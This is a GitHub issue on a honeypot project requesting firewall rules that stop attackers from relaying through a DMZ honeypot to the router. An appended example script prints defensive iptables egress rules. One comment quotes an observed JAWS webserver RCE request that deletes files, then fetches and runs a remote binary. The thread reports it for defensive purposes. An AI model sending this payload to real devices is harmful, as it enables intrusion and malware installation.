Enhancement: firewall-rules (additional) setup #142

Open
jonix-jonixsson opened this issue Jan 17, 2020 · 1 comment

@jonix-jonixsson

Suggestion: when the honeypot is set up, add firewall rule(s) so an outside attacker cannot connect to the router via the honeypot. This ought to apply when the honeypot is located on a DMZ (where it has an address of e.g. 192.168.x.x (black-net IPs), and the router has IP 192.168.x.1 (a usual address)).
There was someone among us who saw an SSH attempt to connect from the honeypot to his/her router/gateway IP, and that kind of connection ought to be blocked with a firewall rule.
Can an installation question be made if the router will be located on a DMZ, or if it will be directly connected to the (wild) internet, and the result of the question will create an (eventual) rule?
It _is_ possible that the ISP can use a non-routable IP range for their customers and NAT that range (e.g. the 10.x.x.x range).

It may be hypothetical, but it is possible to perform this kind of "relay" attack.

@iot-operator

I have not only seen SSH attempts towards my router from the honeypot, but have also already seen attempts to exploit the JAWS Webserver unauthenticated shell RCE via "GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s/jaws;sh+/tmp/jaws".
Hope this will be implemented soon.
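
Added example, not part of this thread or of the project's code: one way the requested installer question could translate into egress rules that stop the honeypot host from opening new connections to its own gateway, whether SSH or HTTP. The function names, the `HONEYPOT_GW` chain name, the `allow-dns` option and the sample gateway address are assumptions; the script only prints the `iptables` commands for review.

```shell
#!/bin/sh
# Added example. Prints iptables commands for review; it does not apply them.
# Assumption: the honeypot runs directly on this host, so its outbound traffic
# traverses OUTPUT. A containerised honeypot needs the same match in the
# forwarding path instead.

# valid_ipv4 ADDR: succeed only for a dotted quad with octets 0-255.
valid_ipv4() {
    case "$1" in *[!0-9.]*|*..*|.*|*.) return 1 ;; esac
    old_ifs=$IFS; IFS=.
    set -- $1
    IFS=$old_ifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "${#octet}" -le 3 ] && [ "$octet" -le 255 ] || return 1
    done
}

# honeypot_egress_rules MODE [GATEWAY_IP] [allow-dns]
#   MODE is the installer answer: "dmz" (a router/gateway sits in front of the
#   honeypot, including an ISP-NATed uplink) or "direct" (no rule emitted).
honeypot_egress_rules() {
    mode=$1 gw=$2 dns=$3
    case "$mode" in
        direct) return 0 ;;
        dmz) ;;
        *) echo "mode must be 'dmz' or 'direct'" >&2; return 2 ;;
    esac
    valid_ipv4 "$gw" || { echo "invalid gateway IP: $gw" >&2; return 2; }
    chain=HONEYPOT_GW   # hypothetical chain name
    echo "iptables -N $chain"
    # Only NEW connections addressed to the gateway itself are diverted.
    # Routed traffic and replies to inbound attacker sessions are untouched.
    echo "iptables -A OUTPUT -d $gw -m conntrack --ctstate NEW -j $chain"
    if [ "$dns" = "allow-dns" ]; then
        # Needed only when the router is also the honeypot's resolver.
        echo "iptables -A $chain -p udp --dport 53 -j RETURN"
        echo "iptables -A $chain -p tcp --dport 53 -j RETURN"
    fi
    # Log before dropping: an outbound attempt at the gateway is a strong
    # sign that the honeypot is being used as a relay.
    echo "iptables -A $chain -j LOG --log-prefix 'honeypot->gw: '"
    echo "iptables -A $chain -j DROP"
}

# Constructed sample values: DMZ install, gateway at 192.168.1.1.
honeypot_egress_rules dmz 192.168.1.1 allow-dns
```

Matching on connection state rather than on destination alone keeps replies to inbound sessions flowing, so the honeypot stays reachable from outside while the gateway's management services are not reachable from it.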
